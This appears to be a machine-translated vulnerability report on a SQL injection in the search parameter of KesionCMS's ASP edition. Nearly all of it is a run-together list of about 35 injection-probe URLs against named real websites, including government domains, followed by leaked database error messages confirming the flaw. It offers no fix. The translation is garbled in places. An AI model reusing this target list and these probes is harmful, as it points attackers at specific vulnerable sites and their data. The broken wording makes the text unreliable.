KesionCMS ASP edition SQL Injection
Search Injection
Obviously one injection, but it seems that the injection needs to be closed. First, the injection is submitted to prove that the injection is closed and handed over to Daniel.
http://www.jfdwy.com/item/?c-5,key-1%27.htmlhttp://www.bqjujia.com/Item/?c-5,key-1%27.htmlhttp://www.gzisc.com.cn/item/?c-5,key-1%27.htmlhttp://www.jzlj.org.cn/item/?c-5,key-1%27.htmlhttp://www.jinlaima.com/Item/?c-5,key-1%27.htmlhttp://jiadewd.com/Item/?c-5,key-1%27.htmlhttp://www.recende.com/item/?c-5,key-1%27.htmlhttp://www.gdtgw.cn/item/?c-5,key-1%27.htmlhttp://www.gmshouji.com/Item/?c-5,key-1%27.htmlhttp://210.47.176.3/page/depart/yjsy/item/?c-5,key-1%27.htmlhttp://www.jdznj.com/item/?c-5,key-1%27.htmlhttp://www.lcsflw.com/item/?c-5,key-1%27.htmlhttp://www.cdsyz.com/item/?c-5,key-1%27.htmlhttp://www.cqgmy.cn/item/?c-5,key-1%27.htmlhttp://www.njyhx.com/item/?c-5,key-1%27.htmlhttp://www.hecelaw.com/item/?c-5,key-1%27.htmlhttp://www.lsjrd.gov.cn/item/?c-5,key-1%27.htmlhttp://www.lfkj.org.cn/item/?c-5,key-1%27.htmlhttp://www.qdzhijia.com/item/?c-5,key-1%27.htmlhttp://www.gushiyouth.org.cn/item/?c-5,key-1%27.htmlhttp://www.xxqzgzb.gov.cn/item/?c-5,key-1%27.htmlhttp://www.hnxddq.cn/item/?c-5,key-1%27.htmlhttp://www.recende.com/item/?c-5,key-1%27.htmlhttp://www.xfwang.cn//item/?c-5,key-1%27.htmlhttp://www.ctyygs.com//item/?c-5,key-1%27.htmlhttp://www.lcsflw.com//item/?c-5,key-1%27.htmlhttp://www.yqhy.gov.cn//item/?c-5,key-1%27.htmlhttp://www.cqgmy.cn//item/?c-5,key-1%27.htmlhttp://www.sxpsxx.com/item/?c-5,key-1%27.htmlhttp://www.xtss.com.cn//item/?c-5,key-1%27.htmlhttp://www.jxdjw.gov.cn//item/?c-5,key-1%27.htmlhttp://www.srxdx.com/item/?c-5,key-1%27.htmlhttp://www.dggraduate.com//item/?c-5,key-1%27.htmlhttp://www.dfttkf.com//item/?c-5,key-1%27.htmlhttp://www.jdznj.com//item/?c-5,key-1%27.html
Http://www.recende.com/item? C-5, key-1000027.html
Microsoft JET Database Engine error '80040e14'
Syntax errors are found in the query expression 'verific = 1 and deltf = 0 And (Title Like '% 1' %') Order by ID Desc.
/Item/Index. asp, row 618
Http://www.jxdjw.gov.cn//item? C-5, key-1000027.html
Microsoft ole db Provider for SQL Server Error '80040e14'
String ') the quotation marks after Order by ID Desc' are incomplete.
/Item/index. asp, row 598